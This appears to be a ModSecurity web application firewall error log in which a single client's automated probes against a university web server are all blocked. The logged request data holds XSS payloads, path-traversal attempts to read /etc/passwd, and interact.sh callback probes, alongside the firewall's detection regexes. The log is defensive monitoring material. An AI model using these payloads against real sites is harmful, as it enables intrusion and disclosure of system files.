[Tue Aug 29 11:52:33.567352 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kcCo-f0AAAjdQdUAAAAZ"]
[Tue Aug 29 11:52:33.709403 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAoQ3I8AAAAN"]
[Tue Aug 29 11:52:33.735259 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAoQ3JAAAAAN"]
[Tue Aug 29 11:52:34.545343 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAnoOrYAAAAf"]
[Tue Aug 29 11:52:34.652751 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAoT7L8AAAAD"]
[Tue Aug 29 11:52:37.539120 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lcCo-f0AAAoGFZIAAAAE"]
[Tue Aug 29 11:52:37.562137 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAnd3IgAAAAI"]
[Tue Aug 29 11:52:37.616430 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAnHQlgAAAAT"]
[Tue Aug 29 11:52:40.534955 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAoLfIYAAAAG"]
[Tue Aug 29 11:52:40.643419 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAoQ3K0AAAAN"]
[Tue Aug 29 11:52:41.737513 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAoQ3LQAAAAN"]
[Tue Aug 29 11:52:42.635207 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoPuXwAAAAM"]
[Tue Aug 29 11:52:43.563023 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15m8Co-f0AAAoO52cAAAAK"]
[Tue Aug 29 11:52:44.548603 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15nMCo-f0AAAnjjToAAAAX"]
[Tue Aug 29 11:52:45.572163 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAoGFaoAAAAE"]
[Tue Aug 29 11:52:46.867681 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15nsCo-f0AAAoXJqcAAAAP"]
[Tue Aug 29 11:52:46.878961 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAnd3MAAAAAI"]
[Tue Aug 29 11:52:47.615379 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAoW7IwAAAAJ"]
[Tue Aug 29 11:52:48.527905 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15oMCo-f0AAAoXJq0AAAAP"]
[Tue Aug 29 11:52:48.779421 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAnTlVcAAAAA"]
[Tue Aug 29 11:52:49.545489 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAoT7QwAAAAD"]
[Tue Aug 29 11:52:49.587347 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15ocCo-f0AAAnd3M4AAAAI"]
[Tue Aug 29 11:52:49.608009 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAoO544AAAAK"]
[Tue Aug 29 11:52:49.672002 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAoT7REAAAAD"]
[Tue Aug 29 11:52:50.562862 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15osCo-f0AAAoPuZ0AAAAM"]
[Tue Aug 29 11:52:52.108469 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO15pMCo-f0AAAoZ6PUAAAAK"]
[Tue Aug 29 11:52:52.625469 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfh.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAoXJrkAAAAP"]
[Tue Aug 29 11:52:52.669181 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAoW7KYAAAAJ"]
[Tue Aug 29 11:52:52.848369 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAoXJr8AAAAP"]
[Tue Aug 29 11:52:55.827613 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15p8Co-f0AAAoXJscAAAAP"]
